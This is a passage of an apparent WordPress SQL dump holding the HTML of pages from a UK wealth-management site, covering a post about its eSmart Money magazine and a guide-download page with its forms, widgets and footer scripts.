10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Warmest regards</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\"/></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">P.S We do hope you enjoy reading our magazine and if you do feel we can help, call us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.</span></span></span></p>&#13;\n</div>&#13;\n<div id=\"_mcePaste\"/>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../esmart-money-januaryfebruary-2014-issue/\" title=\"Comment on eSmart Money January/February 2014 issue\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/&amp;p[title]=eSmart%20Money%20January/February%202014%20issue\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=eSmart+Money+January%2FFebruary+2014+issue+%20http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/&amp;title=eSmart%20Money%20January/February%202014%20issue\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/&amp;title=eSmart%20Money%20January/February%202014%20issue\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fesmart-money-januaryfebruary-2014-issue%2F&amp;name=eSmart+Money+January%2FFebruary+2014+issue+&amp;description=We+hope+the+latest+issue+of+our+magazine+brings+you+financial+inspiration+at+the+start+of+the+New+Year.+Click+here+for+your+FREE+download%C2%A0Smart+Money+Jan+%26%238211%3B+Dec+2014%C2%A0+Now+is+the+perfect+time+to+re-evaluate+your+current+financial+planning+provision+and%2C+in+particular%2C+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=eSmart Money January/February 2014 issue&amp;body=http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../esmart-money-januaryfebruary-2014-issue/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7258\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"7a9fff92be\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"100\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2015									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2015									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li>The guidance and/or advice contained in this website is subject to UK regulatory regime and is therefore restricted to customers based in the UK. INvestoois Authorised and Regulated by the Financial Conduct Authority. INvestoois entered on the FCA register (www.fca.org.uk/register/) under reference 185094. Registered company address: INvestooLimited, .  © Copyright 2017 Equity SMART <br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	eSmart Money January/February 2014 issue','Read about','publish','closed','closed','','esmart-money-januaryfebruary-2014-issue','','','2017-09-21 16:34:29','2017-09-21 16:34:29','',0,'http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue',0,'page','',0),(63,1,'2017-09-21 16:34:29','2017-09-21 16:34:29','<body class=\"single single-avada_portfolio postid-5069 wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n		<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n	&#13;\n	<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n						</div>&#13;\n						<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n						<h1 class=\"entry-title\">Esmart Money</h1>&#13;\n												<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a></li><li>Esmart Money</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n						&#13;\n					<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n						<div id=\"content\" class=\"portfolio-half \" style=\"width:100%\">&#13;\n												<div class=\"single-navigation clearfix\">&#13;\n															<a href=\"/portfolio-items/a-guide-to-annuities\" rel=\"next\">Next</a>&#13;\n					</div>&#13;\n						<div id=\"post-5069\" class=\"post-5069 avada_portfolio type-avada_portfolio status-publish hentry\">&#13;\n									<div class=\"flexslider post-slideshow\">&#13;\n				<ul class=\"slides\"><li>&#13;\n						<a href=\"#\"/>&#13;\n					</li>&#13;\n																								</ul></div>&#13;\n															<div class=\"project-content\">&#13;\n				<div class=\"project-description post-content\" style=\"\">&#13;\n					<h3 style=\"\">Guide Description&#13;\n					</h3><p>The May / June edition of the eSmart money guide from Equity SMART.</p>&#13;\n<p>To download this guide please fill out the short form below, we will then email you a link to the guide:</p>&#13;\n<div class=\"wpcf7\" id=\"wpcf7-f5140-p5069-o1\"><form action=\"../../portfolio-items/esmart-money/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"5140\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.5.1\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f5140-p5069-o1\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"cbc48bfe7a\"/></div>&#13;\n<p>First Name (required)<br/><span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" size=\"30\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\"/></span> </p>&#13;\n<p>Your Email (required)<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"30\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\"/></span> </p>&#13;\n<p><input type=\"submit\" value=\"Download\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n				</div>&#13;\n				<div class=\"project-info\" style=\"\">&#13;\n															<div class=\"project-info-box\">&#13;\n						<h4>Categories:</h4>&#13;\n						<div class=\"project-terms\">&#13;\n							<a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a>						</div>&#13;\n					</div>&#13;\n																			</div>&#13;\n			</div>&#13;\n			<div style=\"clear:both;\"/>&#13;\n									<div class=\"related-posts related-projects\">&#13;\n				<div class=\"title\"><h2>Related Projects</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div id=\"carousel\" class=\"es-carousel-wrapper\">&#13;\n					<div class=\"es-carousel\">&#13;\n						<ul><li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/a-guide-to-protection-planning\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>A Guide To Protection Planning</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/a-guide-to-annuities\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>A Guide To Annuities</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n					<div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div>&#13;\n				</div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"display:none\"><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/\" title=\"A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/a-guide-to-protection-planning\" title=\"A Guide To Protection Planning\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/a-guide-to-annuities\" title=\"A Guide To Annuities\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a 